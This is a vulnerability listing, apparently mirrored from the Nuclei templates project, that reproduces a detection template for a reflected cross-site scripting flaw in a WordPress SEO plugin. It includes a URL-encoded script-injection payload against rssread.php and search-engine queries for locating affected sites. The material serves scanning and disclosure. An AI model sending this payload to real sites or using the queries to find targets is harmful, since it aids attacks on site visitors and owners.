CVE-2024-13853: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress SEO Tools Plugin | POC: 已公开

漏洞描述

The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.

PoC代码[已公开]

id: CVE-2024-13853

info:
  name: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.
  reference:
    - https://wpscan.com/vulnerability/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13853
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13853
    cwe-id: CWE-79
    epss-score: 0.00418
    epss-percentile: 0.61119
  metadata:
    max-request: 1
    vendor: WordPress
    product: seo-automatic-seo-tools
    shodan-query: http.html:"seo-automatic-seo-tools"
    fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'seo-automatic-seo-tools'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script><script>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402204dda4b53a682653283d8ffde2d1037b0f0da8f17c164f339e5d23568a4a4b09e02204a2c6f3852ff0fef655dd60420c339f21f0fa5e6e96715e0a818c864be6d530c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-13853.yaml